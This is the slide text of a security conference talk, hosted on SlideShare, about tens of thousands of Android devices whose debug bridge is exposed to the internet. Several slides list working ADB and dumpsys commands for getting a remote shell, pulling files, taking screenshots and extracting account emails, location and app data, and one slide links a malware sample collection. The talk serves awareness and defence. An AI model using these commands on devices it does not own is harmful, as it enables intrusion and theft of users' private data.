Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Making it Rain Android Shells - How 30,000+ Android devices are exposed to the internet and waiting to be compromised

250 views

Published on

Explore how thousands of Android devices are exposed to the internet through the Android Debug Bridge. Find out what devices are exposed, how they are exposed, examples of what an attacker could do with this exposure as well as what the bad guys are already doing with this exposure. This presentation was presented at BSides Melbourne 2019.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Making it Rain Android Shells - How 30,000+ Android devices are exposed to the internet and waiting to be compromised

  1. 1. Port:5555
  2. 2. Making it Rain Android Shells How 30,000+ Android devices are exposed to the internet and waiting to be compromised Steph Jensen @B15Mu7h
  3. 3. The Android Debug Bridge #BSidesMelb19
  4. 4. The Android Debug Bridge
  5. 5. Exposed Devices
  6. 6. ADB Exposure Top 3 exposed Android versions in order of prevalence: 1. Jelly Bean 2. Nougat 3. Marshmallow
  7. 7. ADB Exposure #BSidesMelb19 Top Mobile device models exposed: 1. Pixel 2 XL (12% global exposure) 2. Samsung Galaxy Note3 (11.2% global exposure) 3. Samsung S5 (11.3% global exposure) Top Impacted Countries 1. South Korea 2. Taiwan 3. China 4. Russia 5. Venezuela
  8. 8. Why is this happening? #BSidesMelb19 2. Vendors are shipping products with ADB enabled over the network1. Developers are enabling ADB To assist in debugging operations (easier over network than USB) 3. Users are enabling ADB on personal devices to access 3rd party applications on their devices
  9. 9. What can you do with a remote ADB connection on non rooted devices? • ADB Commands • Shell commands • Dumpsys • Getprop • So many things you can do!!! #BSidesMelb19
  10. 10. ADB command examples Data Command Shell on 1 device if multiple devices are connected adb -s <ip address> shell Connect multiple devices Run bash script – included at end Upload any file onto device Adb push <file to upload> <file upload location> Download file from device Adb pull <file to download> <location on attacking machine to download files to> Take a screenshot of what is happening on the device Adb screencap -p /<directory to save> <filename>.png Take a video of what is happening on the device Adb screenrecord View System messages and application logs Adb logcat (or can run in shell)
  11. 11. ADB Command example (pull & screencap) #BSidesMelb19 File accessible in external storage areas Check when user Unlocks screen then screenshot
  12. 12. Dumpsys service examples Data Command See all services dumpsys * dumpsys | grep "DUMP OF SERVICE" Accounts used for applications (email addresses) * Dumpsys account Last known location of device * Dumpsys location Data sync info * Dumpsys contents Telephone and provider information * dumpsys telephony.registry Network connection information * Dumpsys connectivity Memory information * Dumpsys meminfo Wifi interface information * Dumpsys wifi #BSidesMelb19 • * Stands for “adb shell” or “adb shell –n” if you are connected to multiple devices with the adb+ script
  13. 13. Dumpsys command examples (account) #BSidesMelb19
  14. 14. Dumpsys command examples (notification) #BSidesMelb19
  15. 15. Other commands Data Command Kernel version * cat /proc/version Find external storage location on device * Echo $EXTERNAL_STORAGE Input keyevents * input <type of input> <input value> System state information * Dumpstate Kernel debugging info * Dmesg System/application logging information * Logcat List all packages on the device pm list packages –f pm path <package name> Access databases using permissions available from specified application * adb run-as debuggable.app.package.name cat databases/file > file #BSidesMelb19 * Stands for “adb shell” or “adb shell –n” if you are connected to multiple devices with the adb+ script.
  16. 16. Information accessible via devices running ADB (unrooted) • Email addresses of user • Username in use in other applications • Notifications from all applications • Phone numbers of contacts • Emails received • Applications the user uses • Location of user • Model, build, version of device • Malware on device • Internal network information • Screenshots of the screen • Access to files in external storage • Database files associated with certain applications #BSidesMelb19
  17. 17. What are the bad guys doing with this exposure? • Cryptominer Turf Wars - (Trinity vs Fbot vs ufo miner) • Backdooring malware • RUSSIANS
  18. 18. Identifying malware through ADB Finding Cryptominers through dumpsys cpuinfo Decompiled ufo.miner – run.html file
  19. 19. Free stuff for you! #BSidesMelb19 Android Malware samples that use ADB as a vector for infection: https://github.com/b15mu7h/androidmalwarezoo
  20. 20. Takeaways • “Features” can be more than benign features • Even if a device isn’t rooted it can expose sensitive information that can be used to takeover accounts, pivot to an internal network, assist in social engineering campaigns or ransom the user. • DON’T EXPOSE THE ANDROID DEBUG BRIDGE TO THE INTERNET #BSidesMelb19 @B15Mu7h

×